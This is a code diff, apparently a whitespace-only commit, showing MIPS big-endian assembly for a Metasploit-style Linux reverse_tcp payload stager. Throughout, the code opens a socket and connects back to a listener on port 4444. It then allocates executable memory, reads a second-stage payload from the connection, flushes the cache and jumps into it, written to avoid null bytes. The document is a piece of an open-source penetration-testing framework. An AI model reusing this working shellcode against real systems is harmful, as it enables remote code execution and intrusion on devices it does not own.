|
27 | 27 | # generate the string to place on: |
28 | 28 | # modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb |
29 | 29 | ## |
30 | | - .text |
31 | | - .align 2 |
| 30 | + .text |
| 31 | + .align 2 |
32 | 32 | .globl main |
33 | | - .set nomips16 |
| 33 | + .set nomips16 |
34 | 34 | main: |
35 | | - .set noreorder |
36 | | - .set nomacro |
37 | | - # socket(PF_INET, SOCK_STREAM, IPPROTO_IP) |
38 | | - # a0: domain = PF_INET (2) |
39 | | - # a1: type = SOCK_STREAM (2) |
40 | | - # a2: protocol = IPPROTO_IP (0) |
41 | | - # v0: syscall = __NR_socket (4183) |
42 | | - li $t7, -6 |
43 | | - nor $t7, $t7, $zero |
44 | | - addi $a0, $t7, -3 |
45 | | - addi $a1, $t7, -3 |
46 | | - slti $a2, $zero, -1 |
47 | | - li $v0, 4183 |
48 | | - syscall 0x40404 |
| 35 | + .set noreorder |
| 36 | + .set nomacro |
| 37 | + # socket(PF_INET, SOCK_STREAM, IPPROTO_IP) |
| 38 | + # a0: domain = PF_INET (2) |
| 39 | + # a1: type = SOCK_STREAM (2) |
| 40 | + # a2: protocol = IPPROTO_IP (0) |
| 41 | + # v0: syscall = __NR_socket (4183) |
| 42 | + li $t7, -6 |
| 43 | + nor $t7, $t7, $zero |
| 44 | + addi $a0, $t7, -3 |
| 45 | + addi $a1, $t7, -3 |
| 46 | + slti $a2, $zero, -1 |
| 47 | + li $v0, 4183 |
| 48 | + syscall 0x40404 |
49 | 49 | slt $s0, $zero, $a3 |
50 | 50 | bne $s0, $zero, failed |
51 | | - sw $v0, -4($sp) # store the file descriptor for the socket on the stack |
| 51 | + sw $v0, -4($sp) # store the file descriptor for the socket on the stack |
52 | 52 |
|
53 | | - # connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16) |
54 | | - # a0: sockfd |
55 | | - # a1: addr = AF_INET (2) |
56 | | - # a2: addrlen = 16 |
57 | | - # v0: syscall = __NR_connect (4170) |
58 | | - lw $a0, -4($sp) |
59 | | - li $t7, -3 |
60 | | - nor $t7, $t7, $zero |
61 | | - sw $t7, -32($sp) |
62 | | - lui $t6, 0x115c |
63 | | - sw $t6, -28($sp) |
64 | | - lui $t6, 0x7f00 # ip |
65 | | - ori $t6, $t6, 0x0001 # ip |
66 | | - sw $t6, -26($sp) |
67 | | - addiu $a1, $sp, -30 |
68 | | - li $t4, -17 |
69 | | - nor $a2, $t4, $zero |
70 | | - li $v0, 4170 |
71 | | - syscall 0x40404 |
| 53 | + # connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16) |
| 54 | + # a0: sockfd |
| 55 | + # a1: addr = AF_INET (2) |
| 56 | + # a2: addrlen = 16 |
| 57 | + # v0: syscall = __NR_connect (4170) |
| 58 | + lw $a0, -4($sp) |
| 59 | + li $t7, -3 |
| 60 | + nor $t7, $t7, $zero |
| 61 | + sw $t7, -32($sp) |
| 62 | + lui $t6, 0x115c |
| 63 | + sw $t6, -28($sp) |
| 64 | + lui $t6, 0x7f00 # ip |
| 65 | + ori $t6, $t6, 0x0001 # ip |
| 66 | + sw $t6, -26($sp) |
| 67 | + addiu $a1, $sp, -30 |
| 68 | + li $t4, -17 |
| 69 | + nor $a2, $t4, $zero |
| 70 | + li $v0, 4170 |
| 71 | + syscall 0x40404 |
72 | 72 | slt $s0, $zero, $a3 |
73 | 73 | bne $s0, $zero, failed |
74 | 74 |
|
75 | | - # mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) |
76 | | - # a0: addr = -1 |
77 | | - # a1: lenght = 4096 |
78 | | - # a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7) |
79 | | - # a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050) |
80 | | - # sp(16): fd = -1 |
81 | | - # sp(20): offset = 0 |
82 | | - # v0: syscall = __NR_mmap (4090) |
83 | | - li $a0, -1 |
84 | | - li $a1, 4097 |
85 | | - addi $a1, $a1, -1 |
86 | | - li $t1, -8 |
87 | | - nor $t1, $t1, $0 |
88 | | - add $a2, $t1, $0 |
89 | | - li $a3, 2050 |
90 | | - li $t3, -22 |
91 | | - nor $t3, $t3, $zero |
92 | | - add $t3, $sp, $t3 |
93 | | - sw $0, -1($t3) # Doesn't use $sp directly to avoid nulls |
94 | | - sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls |
95 | | - li $v0, 4090 |
96 | | - syscall 0x40404 |
| 75 | + # mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) |
| 76 | + # a0: addr = -1 |
| 77 | + # a1: lenght = 4096 |
| 78 | + # a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7) |
| 79 | + # a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050) |
| 80 | + # sp(16): fd = -1 |
| 81 | + # sp(20): offset = 0 |
| 82 | + # v0: syscall = __NR_mmap (4090) |
| 83 | + li $a0, -1 |
| 84 | + li $a1, 4097 |
| 85 | + addi $a1, $a1, -1 |
| 86 | + li $t1, -8 |
| 87 | + nor $t1, $t1, $0 |
| 88 | + add $a2, $t1, $0 |
| 89 | + li $a3, 2050 |
| 90 | + li $t3, -22 |
| 91 | + nor $t3, $t3, $zero |
| 92 | + add $t3, $sp, $t3 |
| 93 | + sw $0, -1($t3) # Doesn't use $sp directly to avoid nulls |
| 94 | + sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls |
| 95 | + li $v0, 4090 |
| 96 | + syscall 0x40404 |
97 | 97 | slt $s0, $zero, $a3 |
98 | 98 | bne $s0, $zero, failed |
99 | | - sw $v0, -8($sp) # Stores the mmap'ed address on the stack |
| 99 | + sw $v0, -8($sp) # Stores the mmap'ed address on the stack |
100 | 100 |
|
101 | | - # read(sockfd, addr, 4096) |
102 | | - # a0: sockfd |
103 | | - # a1: addr |
104 | | - # a2: len = 4096 |
105 | | - # v0: syscall = __NR_read (4003) |
106 | | - lw $a0, -4($sp) |
107 | | - lw $a1, -8($sp) |
108 | | - li $a2, 4097 |
109 | | - addi $a2, $a2, -1 |
110 | | - li $v0, 4003 |
111 | | - syscall 0x40404 |
| 101 | + # read(sockfd, addr, 4096) |
| 102 | + # a0: sockfd |
| 103 | + # a1: addr |
| 104 | + # a2: len = 4096 |
| 105 | + # v0: syscall = __NR_read (4003) |
| 106 | + lw $a0, -4($sp) |
| 107 | + lw $a1, -8($sp) |
| 108 | + li $a2, 4097 |
| 109 | + addi $a2, $a2, -1 |
| 110 | + li $v0, 4003 |
| 111 | + syscall 0x40404 |
112 | 112 | slt $s0, $zero, $a3 |
113 | 113 | bne $s0, $zero, failed |
114 | 114 |
|
115 | | - # cacheflush(addr, nbytes, DCACHE) |
116 | | - # a0: addr |
117 | | - # a1: nbytes |
118 | | - # a2: cache = DCACHE (2) |
119 | | - # v0: syscall = __NR_read (4147) |
120 | | - lw $a0, -8($sp) |
121 | | - add $a1, $v0, $zero |
122 | | - li $t1, -3 |
123 | | - nor $t1, $t1, $0 |
124 | | - add $a2, $t1, $0 |
125 | | - li $v0, 4147 |
126 | | - syscall 0x40404 |
| 115 | + # cacheflush(addr, nbytes, DCACHE) |
| 116 | + # a0: addr |
| 117 | + # a1: nbytes |
| 118 | + # a2: cache = DCACHE (2) |
| 119 | + # v0: syscall = __NR_read (4147) |
| 120 | + lw $a0, -8($sp) |
| 121 | + add $a1, $v0, $zero |
| 122 | + li $t1, -3 |
| 123 | + nor $t1, $t1, $0 |
| 124 | + add $a2, $t1, $0 |
| 125 | + li $v0, 4147 |
| 126 | + syscall 0x40404 |
127 | 127 | slt $s0, $zero, $a3 |
128 | 128 | bne $s0, $zero, failed |
129 | | - # jmp to the stage |
130 | | - lw $s1, -8($sp) |
131 | | - lw $s2, -4($sp) |
132 | | - jalr $s1 |
| 129 | + # jmp to the stage |
| 130 | + lw $s1, -8($sp) |
| 131 | + lw $s2, -4($sp) |
| 132 | + jalr $s1 |
133 | 133 |
|
134 | 134 | failed: |
135 | | - # exit(status) |
136 | | - # a0: status |
137 | | - # v0: syscall = __NR_exit (4001) |
138 | | - li $a0, 1 |
139 | | - li $v0, 4001 |
140 | | - syscall 0x40404 |
| 135 | + # exit(status) |
| 136 | + # a0: status |
| 137 | + # v0: syscall = __NR_exit (4001) |
| 138 | + li $a0, 1 |
| 139 | + li $v0, 4001 |
| 140 | + syscall 0x40404 |
141 | 141 |
|
142 | | - .set macro |
143 | | - .set reorder |
| 142 | + .set macro |
| 143 | + .set reorder |
0 commit comments